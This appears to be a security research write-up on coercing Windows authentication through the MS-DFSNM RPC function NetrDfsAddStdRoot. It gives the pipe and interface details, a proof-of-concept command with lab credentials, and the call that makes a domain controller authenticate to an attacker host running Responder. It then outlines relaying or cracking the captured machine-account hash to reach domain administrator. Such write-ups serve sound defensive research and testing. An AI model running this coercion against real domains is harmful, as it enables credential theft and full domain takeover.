-
Protocol: [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol
-
Function name:
NetrDfsAddStdRoot -
Function operation number:
12 -
RPC Interfaces:
- Interface 1:
- uuid=
4fc742e0-4a10-11cf-8273-00aa004ae673 - version=
3.0 - Accessible through:
- SMB Named pipe:
\PIPE\netdfs
- SMB Named pipe:
- uuid=
- Interface 1:
In order to call a remote procedure to trigger an authentication from the remote machine to an arbitrary target, we first need to authenticate to the remote machine, usually on SMB. Then we need to connect to the remote SMB pipe \PIPE\netdfs and bind to the desired MS-DFSNM protocol (with uuid 4fc742e0-4a10-11cf-8273-00aa004ae673 and version 3.0) in order to perform remote procedure calls to functions in the MS-DFSNM protocol.
The IP 192.168.2.51 being my attacking machine where I listen with Responder, and 192.168.2.1 being the IP of my Windows Server. When starting this script, it will authenticate and connect to the remote pipe named \PIPE\netdfs. This pipe is connected to the protocol [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol and allows to call RPC functions of this protocol. We will then call the remote NetrDfsAddStdRoot function on the remote Windows Server (192.168.2.1) with the following parameters:
NetrDfsAddStdRoot("192.168.2.51\x00", "share\x00", "comment\x00", 0)We can try this with this proof of concept code (coerce_poc.py):
./coerce_poc.py -d "LAB.local" -u "user1" -p "Podalirius123!" 192.168.2.51 192.168.2.1%20Namespace%20Management%20Protocol/12.%20Remote%20call%20to%20NetrDfsAddStdRoot%20(opnum%2012)/imgs/poc.png)
This will force the Windows Server (192.168.2.1) to authenticate to the SMB share \\192.168.2.51\share and therefore authenticate using its machine account (DC01$). After this RPC call, we get an authentication from the domain controller with its machine account directly on Responder:
%20Namespace%20Management%20Protocol/12.%20Remote%20call%20to%20NetrDfsAddStdRoot%20(opnum%2012)/imgs/hash.png)
After this step, we relay the authentication to other services in order to elevate our privileges, or try to downgrade it to NTLMv1 and crack it in order to get the NT hash of the domain controller's machine account. This kind of vulnerabilities allows to quickly get from user to domain administrator in unprotected domains!
NET_API_STATUS NetrDfsAddStdRoot(
[in, string] WCHAR* ServerName,
[in, string] WCHAR* RootShare,
[in, string] WCHAR* Comment,
[in] DWORD ApiFlags
);-
ServerName: The pointer to a null-terminated Unicode string. This is the host name of the new DFS root target.
-
RootShare: The pointer to a null-terminated Unicode string. This is the new DFS root target share name as well as the DFS namespace name. The share MUST already exist.
-
Comment: The pointer to a null-terminated Unicode string that contains a comment associated with the DFS namespace. Used for informational purposes, this string has no protocol-specified restrictions on length or content. The comment is meant for human consumption and does not affect server functionality. This parameter MAY be a NULL pointer.
-
ApiFlags: This parameter is reserved for future use and is ignored by the server.
-
Documentation of protocol [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979
-
Documentation of function
NetrDfsAddStdRoot: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/b18ef17a-7a9c-4e22-b1bf-6a4d07e87b2d